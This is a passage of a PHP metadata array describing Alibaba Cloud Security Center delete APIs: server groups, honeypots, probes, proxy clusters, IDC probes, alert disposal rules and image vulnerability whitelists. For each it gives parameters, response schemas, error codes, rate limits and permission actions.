'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91959', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '192.172.XX.XX', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the server group that you want to delete.'."\n" .'> To delete a server group, you must specify the server group ID. You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to obtain the server group ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '9454789', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a server group', 'summary' => 'Deletes a server group.', 'description' => 'You cannot delete the default server group provided by Security Center, which is **Ungrouped**. After you delete a group, the assets in the group are moved to **Ungrouped** by default.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteGroup'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteGroup', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'Group', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:group/{#GroupId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"Code\\": \\"200\\"\\n}","type":"json"}]', ], 'DeleteHoneypot' => [ 'summary' => 'Deletes a specified honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to query the IDs of honeypots.'."\n", 'type' => 'string', 'required' => true, 'example' => '558b5fa40948ebe2171a74757c54dc7e58f761870fa7ee6a105e70947ec82aa9'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'E14721CB-B32F-56F2-8490-CDA18E4F9268', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"E14721CB-B32F-56F2-8490-CDA18E4F9268\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'DeleteHoneypot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHoneypot', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/{#HoneypotId}'], ], ], ], ], ], 'DeleteHoneypotNode' => [ 'summary' => 'Deletes a specified management node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n" ."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to query the IDs of management nodes.'."\n", 'type' => 'string', 'required' => true, 'example' => '670baeee-86c4-46b9-8200-a2c38141a453'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '49FDE92F-A0B8-56CC-B7A8-23B17646CCAD', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"49FDE92F-A0B8-56CC-B7A8-23B17646CCAD\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'DeleteHoneypotNode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHoneypotNode', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotNode', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotnode/{#NodeId}'], ], ], ], ], ], 'DeleteHoneypotPreset' => [ 'summary' => 'Deletes a specified honeypot template configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '128355', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'HoneypotPresetId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The unique ID of the honeypot template.'."\n" .'>Call the [ListHoneypotPreset](~~ListHoneypotPreset~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '84104b7b-a2bc-41df-a190-12298f99xxxx'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '1A975D03-5F49-5354-B2CB-3918D5DA431A', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a honeypot template configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHoneypotPreset', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotPreset', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotpreset/{#HoneypotPresetId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"1A975D03-5F49-5354-B2CB-3918D5DA431A\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DeleteHoneypotProbe' => [ 'summary' => 'Deletes a specified probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the probe.'."\n" ."\n" .'> You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to query the IDs of probes.'."\n", 'type' => 'string', 'required' => true, 'example' => '95f0f79c-f7e9-4b09-a6e3-95a4cb6d****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7FD1C1DC-AA67-510A-A022-5D23310C3658', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"7FD1C1DC-AA67-510A-A022-5D23310C3658\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'DeleteHoneypotProbe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHoneypotProbe', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotProbe', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotprobe/{#HoneypotProbeId}'], ], ], ], ], ], 'DeleteHoneypotProbeBind' => [ 'summary' => 'Delete the probe service.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" ."\n" .'> You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to query the IDs of probes.'."\n", 'type' => 'string', 'required' => false, 'example' => 'aa234650-cfcf-4e25-b61f-c58f603f****'], ], [ 'name' => 'BindId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The unique ID of the bound service.'."\n", 'type' => 'string', 'required' => false, 'example' => 'aa20815f-f0f3-4e3b-8e13-55771742****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'DeleteHoneypotProbeBind', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHoneypotProbeBind', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DeleteHybridProxy' => [ 'summary' => 'Deletes a proxy node from a specified proxy cluster.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '153489', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'required' => true, 'example' => 'IDC-代理', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the proxy server to delete. The value starts with inet-proxy-.', 'type' => 'string', 'required' => true, 'example' => 'inet-proxy-d2d94e8b-bb25-4744-8004-1e08a53c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'delete fail because,cluster proxy machine is online', 'description' => ''], ['errorCode' => 'DataNotExists', 'errorMessage' => '%s data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a proxy node', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteHybridProxy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHybridProxy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\"\\n}","type":"json"}]', ], 'DeleteHybridProxyCluster' => [ 'summary' => 'Deletes a proxy cluster by cluster name.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '151727', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'required' => true, 'example' => 'proxy', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '414EC213-AD2D-56C3-B140-108773B24405', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'delete fail because,cluster proxy machine is online', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Delete a cluster by cluster name', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteHybridProxyCluster'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteHybridProxyCluster', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"414EC213-AD2D-56C3-B140-108773B24405\\"\\n}","type":"json"}]', ], 'DeleteIdcProbe' => [ 'summary' => 'Deletes an IDC probe that is created in the IDC probe feature of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'inet-1234567****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an IDC probe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteIdcProbe'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteIdcProbe', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX\\"\\n}","type":"json"}]', ], 'DeleteImageEventOperation' => [ 'summary' => 'Deletes an alert disposal rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The primary key of the alert disposal rule.', 'type' => 'integer', 'format' => 'int64', 'docRequired' => true, 'required' => true, 'example' => '1404656'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The primary key of the alert disposal rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '443496'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete an alert disposal rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteImageEventOperation'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteImageEventOperation', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ImageEventOperation', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:imageeventoperation/{#ImageEventOperationId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 443496\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\"\\n}","type":"json"}]', ], 'DeleteImageVulWhitelist' => [ 'summary' => 'Deletes an image vulnerability whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Ids', 'in' => 'query', 'schema' => ['description' => 'The vulnerability whitelist IDs. Separate multiple IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the operation is successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Success' => ['description' => 'Indicates whether the API call is successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete image vulnerability whitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteImageVulWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteImageVulWhitelist', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ 